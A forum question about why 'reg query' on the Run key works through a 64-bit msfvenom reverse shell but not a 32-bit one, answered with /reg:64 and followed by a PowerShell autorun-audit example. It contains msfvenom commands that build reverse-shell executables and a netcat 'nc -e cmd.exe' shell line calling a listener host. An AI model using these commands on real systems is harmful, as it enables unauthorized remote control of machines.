Reverse shell and reg query oddness

Got a curious issue I’m hoping to get an answer to. I’m doing a reverse shell using msfvenom. Depending on how I create it, the following command will or will not show results:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

If I use the following reverse shell, that command returns the contents of the registry key:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.20.1 LPORT=4343 -f exe -o revshell.exe

But if I use this or just create a netcat shell (nc 172.16.20.1 4343 -e cmd.exe), the reg query fails:

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.20.1 LPORT=4343 -f exe -o revshell.exe

The Windows OS is 64-bit so I’m assuming it has something to do with that but I’d like to get a better understanding of why one works and the other doesn’t. Can someone offer some guidance?

Update:

To get that to work, you can append the /reg:64 to the end of the reg query:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /reg:64
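
Added example, not part of the original post: a 32-bit process on 64-bit Windows has HKLM\SOFTWARE redirected to HKLM\SOFTWARE\WOW6432Node, and /reg:64 asks for the 64-bit view instead. The PowerShell below reads the same Run key through both views so an autorun audit run from a 32-bit tool does not miss entries. The function name Get-RunEntries is hypothetical.

```powershell
# Added example: list HKLM ...\CurrentVersion\Run through both WOW64 registry views.
$subKey = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

function Get-RunEntries {   # hypothetical helper name
    param([Microsoft.Win32.RegistryView]$View)

    # OpenBaseKey selects the view explicitly, independent of process bitness.
    $base = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
        [Microsoft.Win32.RegistryHive]::LocalMachine, $View)
    try {
        $key = $base.OpenSubKey($subKey)   # $null when the key is absent in this view
        if ($null -eq $key) { return }
        try {
            foreach ($name in $key.GetValueNames()) {
                [pscustomobject]@{
                    View  = $View
                    Name  = $name
                    # Keep %VAR% references unexpanded so the raw command line is visible.
                    Value = $key.GetValue($name, $null,
                        [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
                }
            }
        } finally { $key.Dispose() }
    } finally { $base.Dispose() }
}

# The bitness of the calling process decides which view a plain "reg query" sees.
"OS 64-bit: $([Environment]::Is64BitOperatingSystem)  Process 64-bit: $([Environment]::Is64BitProcess)"

$v64 = @(Get-RunEntries -View Registry64)   # same view as: reg query ... /reg:64
$v32 = @(Get-RunEntries -View Registry32)   # same view as: reg query ... /reg:32

($v64 + $v32) | Format-Table -AutoSize

# Entries visible in only one view are the ones a single-view audit would miss.
$only64 = @($v64 | Where-Object {
    $e = $_
    -not ($v32 | Where-Object { $_.Name -eq $e.Name -and $_.Value -eq $e.Value })
})
$only32 = @($v32 | Where-Object {
    $e = $_
    -not ($v64 | Where-Object { $_.Name -eq $e.Name -and $_.Value -eq $e.Value })
})
"Only in 64-bit view: $($only64.Count)   Only in 32-bit view: $($only32.Count)"
```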
